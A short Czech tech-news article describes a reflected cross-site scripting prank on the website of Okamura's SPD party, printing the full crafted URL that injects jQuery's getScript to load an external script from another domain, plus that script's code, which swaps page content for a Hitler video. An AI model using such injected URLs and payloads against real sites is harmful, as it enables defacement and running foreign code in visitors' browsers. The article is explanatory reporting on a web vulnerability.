Na stránkách Okamurovy strany se zjevil Hitler. Může za to vtípek s XSS

Na stránkách Okamurovy strany se zjevil Hitler. Může za to vtípek s XSS

Chcete se dozvědět, jak fungují některé útoky typu cross-site scripting (XSS)? V tom případě navštivte tuto upravenou adresu vedoucí na web Okamurovy SPD. Možná to ještě bude fungovat.

Web se sice načte, ale když se podíváte do adresního řádku, je tam drobný kód, který načte externí javascriptový soubor a ten pak už pomocí knihovny jQuery konečně změní původní HTML obsah za vtipné video s Adolfem z YouTube.

Upravená webová adresa, která načte cizí kód:

www.spd.cz/akce?date=2017-09-11%27);$.getScript(%27http://www.krtek.net/spd.js%27);$(%27#kokoti&month=09&year=2017

Kód v externím souboru, který se načetl z cizí domény:

$('.col-md-8 .news').html('<h1>Hitler nebyl uplne spatnej, zabil Hitlera...</h1><iframe width="750" height="421" src="https://www.youtube.com/embed/Qr_TaMfN56c?autoplay=1" frameborder="0" allowfullscreen></iframe>');

Nejedná se o útok v pravém slova smyslu, kdy autor pronikne do systému svého cíle, protože se vše odehrává pouze v prohlížeči surfaře. Mediální efekt ale může být stejný.

Klepněte pro větší obrázek
Web SPD je náchylný k podobným hackům

Témata článku: Web, YouTube, Hacking, Zajímavosti, Politika, Adresní řádek, Vtipné video, Vtípek, Kód, Krtek, Spd, XSS, Externí soubor, Okamura, HTML, Cizí kód, Pravé slovo

Určitě si přečtěte

Budoucností Windows 10 je Fluent Design. Takto bude jednou vypadat celý systém

Budoucností Windows 10 je Fluent Design. Takto bude jednou vypadat celý systém

** Fluent Design je vzhled, do kterého postupně Microsoft převleče celý systém ** Staví na průhlednosti a velkých plochách ** Do Windows 10 se z části dostane už zítra při vydání podzimní aktualizace

Včera | Stanislav Janů | 146


Aktuální číslo časopisu Computer

Nový seriál o programování elektroniky

Otestovali jsme 17 bezdrátových sluchátek

Jak na nákup vánočních dárků ze zahraničí

4 tankové tiskárny v přímém souboji